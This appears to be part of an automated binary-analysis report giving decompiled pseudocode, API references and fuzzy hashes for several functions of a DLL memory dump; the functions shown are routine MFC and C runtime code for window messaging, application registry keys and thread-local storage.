				intOrPtr* _t55;
				void* _t87;
				long _t89;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;

				_t87 = __edx;
				_push(0x10);
				E10013978(E10025FAF, __ebx, __edi, __esi);
				_t92 = __ecx;
				_t40 =  *((intOrPtr*)(_t93 + 8));
				_t96 =  *((intOrPtr*)(_t40 + 8)) - 0xfffffe6b;
				if( *((intOrPtr*)(_t40 + 8)) == 0xfffffe6b) {
					_t89 =  *(_t40 + 0x3c);
					 *(_t93 - 0x10) = _t89;
					E10001F42(_t93 - 0x18, E1000517E());
					 *((intOrPtr*)(_t93 - 4)) = 0;
					E10001F42(_t93 - 0x14, E1000517E());
					_push(_t89);
					_push(_t93 - 0x1c);
					 *((char*)(_t93 - 4)) = 1;
					_t48 = E100040A3(0, __ecx, _t89, __ecx, _t96);
					 *((char*)(_t93 - 4)) = 2;
					E10001F8F(_t93 - 0x14, _t48);
					 *((char*)(_t93 - 4)) = 1;
					E100010A3( *((intOrPtr*)(_t93 - 0x1c)) + 0xfffffff0, _t87);
					_t90 = SendMessageA;
					_push(0);
					_push(0);
					while(1) {
						_t51 = SendMessageA( *(_t92 + 0x20), 0x110a, ??, ??);
						_t97 =  *(_t93 - 0x10) - _t51;
						if( *(_t93 - 0x10) == _t51) {
							break;
						}
						 *(_t93 - 0x10) = SendMessageA( *(_t92 + 0x20), 0x110a, 3,  *(_t93 - 0x10));
						__eflags =  *(_t93 - 0x10) - SendMessageA( *(_t92 + 0x20), 0x110a, 0, 0);
						if(__eflags != 0) {
							_push( *(_t93 - 0x10));
							_push(_t93 - 0x1c);
							_t55 = E100040A3(0x110a, _t92, _t90, _t92, __eflags);
							 *((char*)(_t93 - 4)) = 3;
							_push( *((intOrPtr*)(_t93 - 0x14)));
							E100022F8(_t93 - 0x18, "%s/%s",  *_t55);
							 *((char*)(_t93 - 4)) = 1;
							_t94 = _t94 + 0x10;
							__eflags =  *((intOrPtr*)(_t93 - 0x1c)) + 0xfffffff0;
							E100010A3( *((intOrPtr*)(_t93 - 0x1c)) + 0xfffffff0, _t87);
						} else {
							E100022F8(_t93 - 0x18, "/%s",  *((intOrPtr*)(_t93 - 0x14)));
							_t94 = _t94 + 0xc;
						}
						E10001F8F(_t93 - 0x14, _t93 - 0x18);
						_push(0);
						_push(0);
					}
					E10001732(_t87, _t92, _t97, _t93 - 0x14,  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + 0x3c)));
					E100010A3( *((intOrPtr*)(_t93 - 0x14)) + 0xfffffff0, _t87);
					E100010A3( *((intOrPtr*)(_t93 - 0x18)) + 0xfffffff0, _t87);
				}
				 *( *(_t93 + 0xc)) =  *( *(_t93 + 0xc)) & 0x00000000;
				return E10013A50( *(_t93 + 0xc));
			}

0x10001aeb
0x10001aeb
0x10001af2
0x10001af7
0x10001af9
0x10001afc
0x10001b03
0x10001b09
0x10001b0c
0x10001b18
0x10001b1f
0x10001b2b
0x10001b30
0x10001b34
0x10001b37
0x10001b3b
0x10001b44
0x10001b48
0x10001b4d
0x10001b57
0x10001b5c
0x10001b62
0x10001b63
0x10001be6
0x10001bea
0x10001bec
0x10001bef
0x00000000
0x00000000
0x10001b7e
0x10001b83
0x10001b86
0x10001b9e
0x10001ba4
0x10001ba7
0x10001bac
0x10001bb0
0x10001bbf
0x10001bc4
0x10001bcb
0x10001bce
0x10001bd1
0x10001b88
0x10001b94
0x10001b99
0x10001b99
0x10001bdd
0x10001be2
0x10001be4
0x10001be4
0x10001bff
0x10001c0a
0x10001c15
0x10001c15
0x10001c1d
0x10001c25

APIs

__EH_prolog3.LIBCMT ref: 10001AF2

Part of subcall function 100040A3: __EH_prolog3.LIBCMT ref: 100040AA
Part of subcall function 100040A3: SendMessageA.USER32 ref: 100040F2
Part of subcall function 100040A3: lstrlenA.KERNEL32(?), ref: 100040FB

SendMessageA.USER32 ref: 10001B74
SendMessageA.USER32 ref: 10001B81
SendMessageA.USER32 ref: 10001BEA

Strings

/%s, xrefs: 10001B8E
%s/%s, xrefs: 10001BB9

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$H_prolog3$lstrlen
String ID: %s/%s$/%s
API String ID: 1200115697-3790129931
Opcode ID: a624162b27dfb858d72c39e729bc905421d40a4b1ca1280c7e2cc6ad76d9566b
Instruction ID: b421cb5331daf42cad841b4bd90b1fc040bc3c10466a776e8132212911461e4c
Opcode Fuzzy Hash: a624162b27dfb858d72c39e729bc905421d40a4b1ca1280c7e2cc6ad76d9566b
Instruction Fuzzy Hash: 5B317C7590024AABEB11DBE4CC41FFEB7B8FF04380F104225F1116B296DBB06A458B62

Uniqueness

Uniqueness Score: -1.00%

Function 1000EBAD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E1000EBAD(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
				void _t36;
				void* _t46;
				long _t60;
				void* _t65;
				void* _t81;
				void* _t82;
				intOrPtr _t90;

				_t77 = __edx;
				_t68 = __ecx;
				_t67 = __ebx;
				_push(0x124);
				E100139E1(E10025B8B, __ebx, __edi, __esi);
				_t81 = __ecx;
				 *(_t82 - 0x120) = 0;
				 *(_t82 - 0x12c) = 0;
				_t36 = E1000E9B0(__ecx, __edx);
				 *(_t82 - 0x128) = _t36;
				if(_t36 != 0) {
					do {
						_t65 = _t82 - 0x128;
						_push(_t65);
						_t68 = _t81;
						E1000E9C1();
						if(_t65 != 0) {
							_t77 =  *_t65;
							_t68 = _t65;
							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while ( *(_t82 - 0x128) != 0);
				}
				if( *((intOrPtr*)(_t81 + 0x54)) != 0) {
					_t90 =  *((intOrPtr*)(_t81 + 0x68));
					_t91 = _t90 == 0;
					if(_t90 == 0) {
						E1000572D(_t67, _t68, 0, _t81, _t91);
					}
					_push("Software\\");
					E10001C4E(_t67, _t82 - 0x11c, 0, _t81, _t91);
					 *((intOrPtr*)(_t82 - 4)) = 0;
					E100041E8(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x54)));
					_push("\\");
					_push(_t82 - 0x11c);
					_push(_t82 - 0x130);
					_t46 = E10001DB1(_t67, 0, _t81, _t91);
					_push( *((intOrPtr*)(_t81 + 0x68)));
					 *((char*)(_t82 - 4)) = 1;
					_push(_t46);
					_push(_t82 - 0x124);
					E10001DB1(_t67, 0, _t81, _t91);
					 *((char*)(_t82 - 4)) = 3;
					E100010A3( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
					_push(_t82 - 0x124);
					_t81 = 0x80000001;
					_push(0x80000001);
					E1000EA2F(_t67, _t77, 0, 0x80000001, _t91);
					if(RegOpenKeyA(0x80000001,  *(_t82 - 0x11c), _t82 - 0x120) == 0) {
						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
						_t93 = _t60 - 0x103;
						if(_t60 == 0x103) {
							_push(_t82 - 0x11c);
							_push(0x80000001);
							E1000EA2F(_t67, _t77, 0, 0x80000001, _t93);
						}
						RegCloseKey( *(_t82 - 0x120));
					}
					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
					E100010A3( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
					E100010A3( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
				}
				return E10013A64(_t67, 0, _t81);
			}

0x1000ebad
0x1000ebad
0x1000ebad
0x1000ebad
0x1000ebb7
0x1000ebbe
0x1000ebc0
0x1000ebc6
0x1000ebcc
0x1000ebd1
0x1000ebd9
0x1000ebdb
0x1000ebdb
0x1000ebe1
0x1000ebe2
0x1000ebe4
0x1000ebeb
0x1000ebed
0x1000ebf4
0x1000ebf6
0x1000ebf6
0x1000ebf9
0x1000ebdb
0x1000ec04
0x1000ec0c
0x1000ec12
0x1000ec14
0x1000ec16
0x1000ec16
0x1000ec1b
0x1000ec26
0x1000ec34
0x1000ec37
0x1000ec3c
0x1000ec47
0x1000ec4e
0x1000ec4f
0x1000ec54
0x1000ec57
0x1000ec5b
0x1000ec62
0x1000ec63
0x1000ec74
0x1000ec78
0x1000ec83
0x1000ec84
0x1000ec89
0x1000ec8a
0x1000eca5
0x1000ecba
0x1000ecc0
0x1000ecc5
0x1000eccd
0x1000ecce
0x1000eccf
0x1000eccf
0x1000ecda
0x1000ecda
0x1000ecf5
0x1000ed04
0x1000ed12
0x1000ed12
0x1000ed1f

APIs

__EH_prolog3_GS.LIBCMT ref: 1000EBB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000EC9D
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1000ECBA
RegCloseKey.ADVAPI32(?), ref: 1000ECDA
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000ECF5

Strings

Software\, xrefs: 1000EC1B

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: a1484c35a9530df599e01d68d8b555346dcaa3290719c0f8d15cf64b085dbe89
Instruction ID: 35588609d6c4e09f4422477fa23b6eb52e164e017e544425430c4f6281d49357
Opcode Fuzzy Hash: a1484c35a9530df599e01d68d8b555346dcaa3290719c0f8d15cf64b085dbe89
Instruction Fuzzy Hash: 6341DF35900168DBEB22DB64CC81EDEB3B8FF49390F5002D9F189B2195DB30AE958F91

Uniqueness

Uniqueness Score: -1.00%

Function 1000EA2F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000EA2F(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t38;
				void* _t51;
				void* _t54;
				signed int _t57;
				void* _t67;
				void* _t71;
				void* _t73;
				void* _t76;

				_t76 = __eflags;
				_t67 = __edx;
				_t57 = __ebx;
				_push(0x124);
				E10013A17(E10025B42, __ebx, __edi, __esi);
				_t71 =  *(_t73 + 8);
				 *(_t73 - 0x12c) = _t71;
				E10001F67(_t73 - 0x124, _t76,  *((intOrPtr*)(_t73 + 0xc)));
				 *((intOrPtr*)(_t73 - 4)) = 0;
				if(_t71 == 0x80000000) {
					_t51 = E1000669D();
					_t78 = _t51 - 1;
					if(_t51 == 1) {
						_push(_t73 - 0x124);
						_push("Software\\Classes\\");
						_push(_t73 - 0x120);
						_t54 = E1000E9DA(__ebx, 0, _t71, _t78);
						 *((char*)(_t73 - 4)) = 1;
						E10001F8F(_t73 - 0x124, _t54);
						 *((char*)(_t73 - 4)) = 0;
						E100010A3( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
						 *(_t73 - 0x12c) = 0x80000001;
					}
				}
				_t38 = RegOpenKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124), _t73 - 0x128);
				_t72 = _t38;
				if(_t38 != 0) {
					L11:
					__eflags =  &(( *(_t73 - 0x124))[0xfffffffffffffff0]);
					E100010A3( &(( *(_t73 - 0x124))[0xfffffffffffffff0]), _t67);
					return E10013A73(_t57, 0, _t72);
				} else {
					while(1) {
						_t72 = RegEnumKeyA( *(_t73 - 0x128), 0, _t73 - 0x11c, 0x104);
						_t81 = _t72;
						if(_t72 != 0) {
							break;
						}
						_push(_t73 - 0x11c);
						 *((char*)(_t73 - 4)) = 2;
						E10001C4E(_t57, _t73 - 0x120, 0, _t72, _t81);
						 *((char*)(_t73 - 4)) = 3;
						_t72 = E1000EA2F(_t57, _t67, 0, _t72, _t81,  *(_t73 - 0x128), _t73 - 0x120);
						_t57 = _t57 & 0xffffff00 | _t72 != 0x00000000;
						 *((char*)(_t73 - 4)) = 2;
						E100010A3( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
						if(_t57 != 0) {
							break;
						}
						 *((intOrPtr*)(_t73 - 4)) = 0;
					}
					__eflags = _t72 - 0x103;
					if(_t72 == 0x103) {
						L9:
						_t72 = RegDeleteKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124));
						L10:
						RegCloseKey( *(_t73 - 0x128));
						goto L11;
					}
					__eflags = _t72 - 0x3f2;
					if(_t72 != 0x3f2) {
						goto L10;
					}
					goto L9;
				}
			}

0x1000ea2f
0x1000ea2f
0x1000ea2f
0x1000ea2f
0x1000ea39
0x1000ea41
0x1000ea4b
0x1000ea51
0x1000ea58
0x1000ea61
0x1000ea63
0x1000ea68
0x1000ea6b
0x1000ea73
0x1000ea7a
0x1000ea7f
0x1000ea80
0x1000ea8f
0x1000ea93
0x1000eaa1
0x1000eaa5
0x1000eaaa
0x1000eaaa
0x1000ea6b
0x1000eac7
0x1000eacd
0x1000ead1
0x1000eb95
0x1000eb9b
0x1000eb9e
0x1000ebaa
0x1000ead7
0x1000ead7
0x1000eaf0
0x1000eaf2
0x1000eaf4
0x00000000
0x00000000
0x1000eafc
0x1000eb03
0x1000eb07
0x1000eb19
0x1000eb28
0x1000eb2c
0x1000eb32
0x1000eb36
0x1000eb3d
0x00000000
0x00000000
0x1000eb3f
0x1000eb3f
0x1000eb65
0x1000eb6b
0x1000eb75
0x1000eb87
0x1000eb89
0x1000eb8f
0x00000000
0x1000eb8f
0x1000eb6d
0x1000eb73
0x00000000
0x00000000
0x00000000
0x1000eb73

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1000EA39
RegOpenKeyA.ADVAPI32(?,?,?), ref: 1000EAC7
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 1000EAEA

Part of subcall function 1000E9DA: __EH_prolog3.LIBCMT ref: 1000E9E1

Strings

Software\Classes\, xrefs: 1000EA7A

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumH_prolog3H_prolog3_catch_Open
String ID: Software\Classes\
API String ID: 3518408925-1121929649
Opcode ID: cca96d37e690932d2d0cbb201978797c9f619f334bbc7e1bdc92761cf11c4107
Instruction ID: 5e0de5ff345e3b977ac5cfe9aba82517dcbad828f2dac5e71734e9424712d3cb
Opcode Fuzzy Hash: cca96d37e690932d2d0cbb201978797c9f619f334bbc7e1bdc92761cf11c4107
Instruction Fuzzy Hash: 3E316D36C001A89BEB22DB64CC44BDDB7B4EF0D390F1401D5E99977296DB306EA49F91

Uniqueness

Uniqueness Score: -1.00%

Function 10011745, Relevance: 10.6, APIs: 7, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E10011745(intOrPtr __ecx) {
				struct HWND__* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t15;
				long _t16;
				struct HWND__* _t17;
				void* _t18;
				struct HWND__* _t19;
				void* _t30;

				_t24 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = __ecx;
				_t15 = GetCapture();
				_t30 = SendMessageA;
				while(1) {
					_v8 = _t15;
					if(_t15 == 0) {
						break;
					}
					_t16 = SendMessageA(_v8, 0x365, 0, 0);
					__eflags = _t16;
					if(__eflags == 0) {
						_t15 = E1000A873(_t24, 0x365, __eflags, _v8);
						continue;
					}
					L15:
					return _t16;
				}
				_t17 = GetFocus();
				while(1) {
					_v8 = _t17;
					if(_t17 == 0) {
						break;
					}
					_t16 = SendMessageA(_v8, 0x365, 0, 0);
					__eflags = _t16;
					if(__eflags == 0) {
						_t17 = E1000A873(_t24, 0x365, __eflags, _v8);
						continue;
					}
					goto L15;
				}
				_t25 = _v12;
				_t18 = E1000A8BD(0, _v12, 0x365);
				_t34 = _t18;
				if(_t18 == 0) {
					_t18 = E1000572D(0, _t25, 0x365, _t30, _t34);
				}
				_t19 = GetLastActivePopup( *(_t18 + 0x20));
				while(1) {
					_v8 = _t19;
					_push(0);
					if(_t19 == 0) {
						break;
					}
					_t16 = SendMessageA(_v8, 0x365, 0, ??);
					__eflags = _t16;
					if(__eflags == 0) {
						_t19 = E1000A873(_t25, 0x365, __eflags, _v8);
						continue;
					}
					goto L15;
				}
				_t16 = SendMessageA( *(_v12 + 0x20), 0x111, 0xe147, ??);
				goto L15;
			}

0x10011745
0x1001174a
0x1001174b
0x1001174f
0x10011752
0x10011758
0x1001177b
0x1001177b
0x10011780
0x00000000
0x00000000
0x1001176d
0x1001176f
0x10011771
0x10011776
0x00000000
0x10011776
0x100117ee
0x100117f2
0x100117f2
0x10011782
0x1001179e
0x1001179e
0x100117a3
0x00000000
0x00000000
0x10011790
0x10011792
0x10011794
0x10011799
0x00000000
0x10011799
0x00000000
0x10011794
0x100117a5
0x100117a8
0x100117ad
0x100117af
0x100117b1
0x100117b1
0x100117b9
0x100117d4
0x100117d4
0x100117d7
0x100117da
0x00000000
0x00000000
0x100117c6
0x100117c8
0x100117ca
0x100117cf
0x00000000
0x100117cf
0x00000000
0x100117ca
0x100117ec
0x00000000

APIs

GetCapture.USER32 ref: 10011752
SendMessageA.USER32 ref: 1001176D
GetFocus.USER32 ref: 10011782
SendMessageA.USER32 ref: 10011790
GetLastActivePopup.USER32(?), ref: 100117B9
SendMessageA.USER32 ref: 100117C6

Part of subcall function 1000A873: GetWindowLongA.USER32 ref: 1000A899
Part of subcall function 1000A873: GetParent.USER32(?), ref: 1000A8A7

SendMessageA.USER32 ref: 100117EC

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: af3f714035b9a9e876629216f2cb6d46dc32624684584ccafe1868906f98f1ba
Instruction ID: dfd4d2a3c0441dc41afef2a01582f52d28c52b8d6b5bb682398f6bdf689a68c0
Opcode Fuzzy Hash: af3f714035b9a9e876629216f2cb6d46dc32624684584ccafe1868906f98f1ba
Instruction Fuzzy Hash: A6116374A09119FFEB04EBA1CDC5CDE7EB9EF406C8B2144B5F500AA260DB31DE41AB60

Uniqueness

Uniqueness Score: -1.00%

Function 100115E1, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100115E1(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x100115fe
0x10011605
0x10011608
0x1001160b
0x1001160e
0x10011619
0x10011650
0x10011650
0x1001165b
0x10011660
0x10011660
0x10011665
0x1001166a
0x1001166a
0x10011673

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10011611
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10011634
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10011650
RegCloseKey.ADVAPI32(?), ref: 10011660
RegCloseKey.ADVAPI32(?), ref: 1001166A

Strings

software, xrefs: 100115F9

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ebf608588c9af3713da010b1632f3f6aa5f1a0c0cc816ab155de51397c1f6400
Instruction ID: dc10c0c38a2e6c1a6d020c0825ed033ac3441c2a3d8a840df333513948bb660a
Opcode Fuzzy Hash: ebf608588c9af3713da010b1632f3f6aa5f1a0c0cc816ab155de51397c1f6400
Instruction Fuzzy Hash: F611E372D00158FBDB11DB9ACC88CDFBFBDEB89750B5000AAF505A2121D3319A45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010A9A, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10010A9A(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10015E7B(0, 0);
				_t22 = E1000522E(_t31, __esi, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E100056F5(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10013A90(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10013A50(_t28);
			}

0x10010a9a
0x10010a9a
0x10010a9a
0x10010aa1
0x10010aab
0x10010ab7
0x10010abd
0x10010ac2
0x10010ac8
0x10010aca
0x10010acf
0x10010ad5
0x10010ad5
0x10010add
0x10010aee
0x10010afa
0x10010aff
0x10010b05
0x10010b08
0x10010b0d
0x10010b17
0x10010b17
0x10010b1a
0x10010b20
0x10010b2b

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10010AA1
__CxxThrowException@8.LIBCMT ref: 10010AAB

Part of subcall function 10015E7B: RaiseException.KERNEL32(?,00000004,100012B7,1F496801,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10015EBD

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010AC2
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010ACF

Part of subcall function 100056F5: __CxxThrowException@8.LIBCMT ref: 1000570B

_memset.LIBCMT ref: 10010AEE
TlsSetValue.KERNEL32(?,00000000,1F496801), ref: 10010AFF
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10006DFB,10005749,100012B7,1F496801), ref: 10010B20

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 645d37c998948dc245ba8e9e94edae38070bc541f03f8de63234aa0398598c0f
Instruction ID: 8340098f09fcac7fced8a8cb604460bb1d9f77b4912c0a0a1a4509d2ac746570
Opcode Fuzzy Hash: 645d37c998948dc245ba8e9e94edae38070bc541f03f8de63234aa0398598c0f
Instruction Fuzzy Hash: EE112A74600606AFE714EF64CC96D2ABBA9FF04354761C528F95A9A522CB31FC608B51

Uniqueness

Uniqueness Score: -1.00%

Function 10017BA8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10017BA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002e460);
				E10013B28(__ebx, __edi, __esi);
				_t31 = E10018651(__ebx, __edx, __edi, _t35);
				_t15 =  *0x100322e4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A8F1(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x100321e8; // 0x4771620
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10031dc0;
								if(__eflags != 0) {
									_push(_t33);
									E10013504(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x100321e8; // 0x4771620
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x100321e8; // 0x4771620
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E10017C43();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1001632B(_t29, _t31, 0x20);
				}
				return E10013B6D(_t33);
			}

0x10017ba8
0x10017ba8
0x10017ba8
0x10017ba8
0x10017baa
0x10017baf
0x10017bb9
0x10017bbb
0x10017bc3
0x10017be4
0x10017bea
0x10017bee
0x10017bf1
0x10017bf4
0x10017bfa
0x10017bfc
0x10017bfe
0x10017c01
0x10017c07
0x10017c09
0x10017c0b
0x10017c11
0x10017c13
0x10017c14
0x10017c19
0x10017c11
0x10017c09
0x10017c1a
0x10017c1f
0x10017c22
0x10017c28
0x10017c2c
0x10017c2c
0x10017c32
0x10017c39
0x10017bcb
0x10017bcb
0x10017bcb
0x10017bd0
0x10017bd4
0x10017bd9
0x10017be1

APIs

__getptd.LIBCMT ref: 10017BB4

Part of subcall function 10018651: __getptd_noexit.LIBCMT ref: 10018654
Part of subcall function 10018651: __amsg_exit.LIBCMT ref: 10018661

__amsg_exit.LIBCMT ref: 10017BD4
